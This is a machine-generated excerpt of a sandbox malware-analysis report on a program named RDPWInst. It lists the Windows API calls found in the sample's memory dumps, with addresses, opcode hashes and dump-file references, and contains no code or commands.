                                                                                                                                  • Opcode Fuzzy Hash: 2576ac7df62392cdd79f5341252eb240a6292d2d2deea21fb17a0e0107b6f450
                                                                                                                                  • Instruction Fuzzy Hash: 4E0180B87803018FC718EF59D8D1A9A73E9AB99320709453EE241577A1CF3C9C40DB59
                                                                                                                                  APIs
                                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00419633
                                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0041964F
                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004196C6
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 004196EF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 920484758-0
                                                                                                                                  • Opcode ID: 0f680bb846408bca051d329f0f9141866d040382b2d86f627a051af50f217def
                                                                                                                                  • Instruction ID: d3a60771d8c98d42dda0da8010ad17e71a6e6e293320ab5b6f42a6f3f22a61d9
                                                                                                                                  • Opcode Fuzzy Hash: 0f680bb846408bca051d329f0f9141866d040382b2d86f627a051af50f217def
                                                                                                                                  • Instruction Fuzzy Hash: F7410D75A0061D9FCB61DF59CC90BD9B3FCAB48314F0055DAE549A7212DA38AFC18F64
                                                                                                                                  APIs
                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00413408), ref: 0041328F
                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004132B3
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004132CE
                                                                                                                                  • LoadStringW.USER32(00000000,0000FFE5,?,00000100), ref: 00413369
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3990497365-0
                                                                                                                                  • Opcode ID: b4db8f4b60a4758e302225d89cd2c63d37b5a2fd60e804dc2dc20906c96adb53
                                                                                                                                  • Instruction ID: 83055b0679be0c1ffa726a7bf1997f9f19e1454b2f4a6b728642dd338ff24854
                                                                                                                                  • Opcode Fuzzy Hash: b4db8f4b60a4758e302225d89cd2c63d37b5a2fd60e804dc2dc20906c96adb53
                                                                                                                                  • Instruction Fuzzy Hash: 80412070A003589FDB20EF59CC81BCAB7B9AB49304F0040FAE508E7251DB7A9E94CF59
                                                                                                                                  APIs
                                                                                                                                  • GetThreadUILanguage.KERNEL32(?,00000000), ref: 00408B19
                                                                                                                                  • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 00408B7B
                                                                                                                                  • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 00408BD8
                                                                                                                                  • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 00408C0B
                                                                                                                                    • Part of subcall function 00408AC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,00408B89), ref: 00408ADB
                                                                                                                                    • Part of subcall function 00408AC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,00408B89), ref: 00408AF8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$LanguagesPreferred$Language
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2255706666-0
                                                                                                                                  • Opcode ID: 57ba5b2eaa9ba2f7f394178960eeeee68cc8fe68392739164dda0304afca2262
                                                                                                                                  • Instruction ID: ba3eb85df9a642da38a4383696d7f270617e705f6d5ccbab9dd9f20305666083
                                                                                                                                  • Opcode Fuzzy Hash: 57ba5b2eaa9ba2f7f394178960eeeee68cc8fe68392739164dda0304afca2262
                                                                                                                                  • Instruction Fuzzy Hash: 5A317C70A1021A9BDB00DFE9C885AAEB3B5FF44304F00457AE991E72D1DB78AE44CB58
                                                                                                                                  APIs
                                                                                                                                  • FindResourceW.KERNEL32(00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8,?,0044BFA8,00000000,?,0043CEE1), ref: 0042FB5F
                                                                                                                                  • LoadResource.KERNEL32(00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8,?,0044BFA8,00000000), ref: 0042FB79
                                                                                                                                  • SizeofResource.KERNEL32(00400000,0042FBE4,00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8), ref: 0042FB93
                                                                                                                                  • LockResource.KERNEL32(0042F774,00000000,00400000,0042FBE4,00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000), ref: 0042FB9D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                  • Opcode ID: 6ebdd4f1cd543b76a016c77fc1286a410c61f79913e5f64509fe1404532659ad
                                                                                                                                  • Instruction ID: 2319d0df2cd87803d0a75df5626f4cddb48e3135002f19a9a4d545a6677a7621
                                                                                                                                  • Opcode Fuzzy Hash: 6ebdd4f1cd543b76a016c77fc1286a410c61f79913e5f64509fe1404532659ad
                                                                                                                                  • Instruction Fuzzy Hash: 49F06DB37012146F9745EEADA881D6B77FDEE88264390017FFA08D7202DA38ED154379
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(00449C1C), ref: 0040A0F8
                                                                                                                                  • lstrcmpiA.KERNEL32(?,?), ref: 0040A10E
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00449C1C,00449C1C), ref: 0040A143
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeavelstrcmpi
                                                                                                                                  • String ID: YD
                                                                                                                                  • API String ID: 2420758022-4277794568
                                                                                                                                  • Opcode ID: 0b44f2d380ec5fe545f4f2e3965f64519b1ec05f6d6c381fa1d4a9968702bb33
                                                                                                                                  • Instruction ID: abf7b61c1320a37f19f23f54b7b1c16b8e1f28cb69a34480c51c1f01e8ca554a
                                                                                                                                  • Opcode Fuzzy Hash: 0b44f2d380ec5fe545f4f2e3965f64519b1ec05f6d6c381fa1d4a9968702bb33
                                                                                                                                  • Instruction Fuzzy Hash: 8AF062322003145BEF106A619CC2B1677989F15714F100037FB007F2C3D6BC9C60466F
                                                                                                                                  APIs
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405A9A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                  • String ID: $$@
                                                                                                                                  • API String ID: 3192549508-1194432280
                                                                                                                                  • Opcode ID: ffbabee0d71fd2b7d8fc05915f2ca3a30f23b11c7e3ffcedbc7f052df7b7c5c2
                                                                                                                                  • Instruction ID: fff674c7101e68f6d73d2d8a69124ddc370c84ad249f2bdacb9cff7d7fa155c1
                                                                                                                                  • Opcode Fuzzy Hash: ffbabee0d71fd2b7d8fc05915f2ca3a30f23b11c7e3ffcedbc7f052df7b7c5c2
                                                                                                                                  • Instruction Fuzzy Hash: 1C418C75304A019FD720DB14D884B2BB7A5EB89314F69867AF444AB392C738EC41CF69
                                                                                                                                  APIs
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405906
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_0000589C), ref: 00405943
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                  • String ID: $$@
                                                                                                                                  • API String ID: 3192549508-1194432280
                                                                                                                                  • Opcode ID: 23fdc1c80813b7a19c68f0c79cc3fa5e3fa91e7525bef4bca6a264e8681dbcfb
                                                                                                                                  • Instruction ID: 4b325d1a8302ad8f82e944498d23502563e7d009f61a8d4e6d3783212fd5e4e2
                                                                                                                                  • Opcode Fuzzy Hash: 23fdc1c80813b7a19c68f0c79cc3fa5e3fa91e7525bef4bca6a264e8681dbcfb
                                                                                                                                  • Instruction Fuzzy Hash: 533141B4604700EFD720DB10D888B6BBBA9EB84724F54857AF448A7291C738EC40CF69
                                                                                                                                  APIs
                                                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00411595), ref: 0041152C
                                                                                                                                  • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00411595), ref: 00411532
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DateFormatLocaleThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3303714858-3916222277
                                                                                                                                  • Opcode ID: 0d5b63d8b5d64c377b747a6270c18780734cafdd64312a6cbce0b29c00a6c7cf
                                                                                                                                  • Instruction ID: da40258a30b1bf54e866a7fbbaf5cc9082ba5d6ba5cf06b5a9e2a769468a01f6
                                                                                                                                  • Opcode Fuzzy Hash: 0d5b63d8b5d64c377b747a6270c18780734cafdd64312a6cbce0b29c00a6c7cf
                                                                                                                                  • Instruction Fuzzy Hash: 2C21BB31A04254AFC711DF64C8556EA77B5EF49300F4140A7FD45E72A1D6389E50C7AA
                                                                                                                                  APIs
                                                                                                                                  • GetThreadLocale.KERNEL32 ref: 00415102
                                                                                                                                  • GetSystemMetrics.USER32(0000004A), ref: 00415153
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LocaleMetricsSystemThread
                                                                                                                                  • String ID: p[D
                                                                                                                                  • API String ID: 3035471613-2202972244
                                                                                                                                  • Opcode ID: da98f0b9cf3a04fcb2a289a8677121395d8df8e9f207d3304538472cbe0e1366
                                                                                                                                  • Instruction ID: 0794bcb2409efff6a4af82a72d6dc306925be2e2831a755ee0de451743422fb7
                                                                                                                                  • Opcode Fuzzy Hash: da98f0b9cf3a04fcb2a289a8677121395d8df8e9f207d3304538472cbe0e1366
                                                                                                                                  • Instruction Fuzzy Hash: 4A010430A00650EADB129E6658813D27BD49B82315F48C0BBED489F387D63CD881C77A
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00447324,00443D31,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043A693
                                                                                                                                    • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                  • API String ID: 1646373207-3689287502
                                                                                                                                  • Opcode ID: 3a9063c87b9bf03a8dd6229c9438aece060355b6351e033b19066e162e83d57d
                                                                                                                                  • Instruction ID: 7cbe884eb00d1b8f8e0b90a93abb1152f64afda344a6e4615680911855581588
                                                                                                                                  • Opcode Fuzzy Hash: 3a9063c87b9bf03a8dd6229c9438aece060355b6351e033b19066e162e83d57d
                                                                                                                                  • Instruction Fuzzy Hash: D4E012513883C21AD61276FA1DD2B2E26CC4B6D709F2C287FB5C0D1193D99DC468863F
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00447324,00443E55,000001F4,000001F4,000003E8,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043A72F
                                                                                                                                    • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                  • API String ID: 1646373207-1355242751
                                                                                                                                  • Opcode ID: 349a73e186955f1baf5885772f004c34863de15e74dc15c33fb7743de3b5e964
                                                                                                                                  • Instruction ID: 7f98099b70b18dc0c665e624c368f4c8ddeaec672eef30118536404a03429535
                                                                                                                                  • Opcode Fuzzy Hash: 349a73e186955f1baf5885772f004c34863de15e74dc15c33fb7743de3b5e964
                                                                                                                                  • Instruction Fuzzy Hash: FBE0C2013883C21EE60272F90DD1B3A17D84B6C308F24183FB1C0D1183DB9CC524862F
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0044313B,00000000,0044315A), ref: 00415B46
                                                                                                                                    • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                                                                  • API String ID: 1646373207-1127948838
                                                                                                                                  • Opcode ID: a738386b4eb64180ba5d2c03a1b622a8c2aaab42401b0cdd019b227c0ec9c639
                                                                                                                                  • Instruction ID: 4ad585b0bbb22d8cb86f0bca7bf1fd5c676b9542b5302fef9f3b12a8682de55f
                                                                                                                                  • Opcode Fuzzy Hash: a738386b4eb64180ba5d2c03a1b622a8c2aaab42401b0cdd019b227c0ec9c639
                                                                                                                                  • Instruction Fuzzy Hash: 92D0C7B4745F85DBFF10DBA55D83BD62254E785309B10043B70046D2D3D67C6894CB1D